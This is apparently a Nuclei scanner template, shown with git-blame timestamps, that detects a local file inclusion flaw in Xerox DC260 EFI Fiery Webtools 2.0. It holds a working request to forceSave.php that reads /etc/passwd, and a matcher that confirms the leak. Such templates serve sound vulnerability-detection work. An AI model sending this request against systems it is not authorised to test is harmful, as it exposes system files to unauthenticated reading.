2022-01-09 06:39:39 +00:00
id : xerox-efi-lfi
info :
2022-08-05 13:57:51 +00:00
name : Xerox DC260 EFI Fiery Controller Webtools 2.0 - Local File Inclusion
2022-01-09 06:39:39 +00:00
author : gy741
severity : high
2022-08-05 13:57:51 +00:00
description : Xerox DC260 EFI Fiery Controller Webtools 2.0 is vulnerable to local file inclusion because input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system.
2022-01-09 06:39:39 +00:00
reference :
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php
2022-01-10 06:37:06 +00:00
- https://packetstormsecurity.com/files/145570
- https://www.exploit-db.com/exploits/43398/
2022-08-05 13:57:51 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-10-14 11:27:55 +00:00
tags : iot,xerox,disclosure,lfi,packetstorm,edb
2022-01-09 06:39:39 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-01-09 06:39:39 +00:00
- method : GET
path :
- "{{BaseURL}}/wt3/forceSave.php?file=/etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
- "root:.*:0:0:"
- type : status
status :
- 200
2023-10-20 11:41:13 +00:00
# digest: 4a0a00473045022100df516cfc896ae17928cb064dce74ddfa3a9dfb9926355ce2bb55e2fd85b50902022001ce6d105bae175ffeaba26a8a9cd7c9689319d982b17031ea2d7914771fa77d:922c64590222798bb761d5b6d8e72950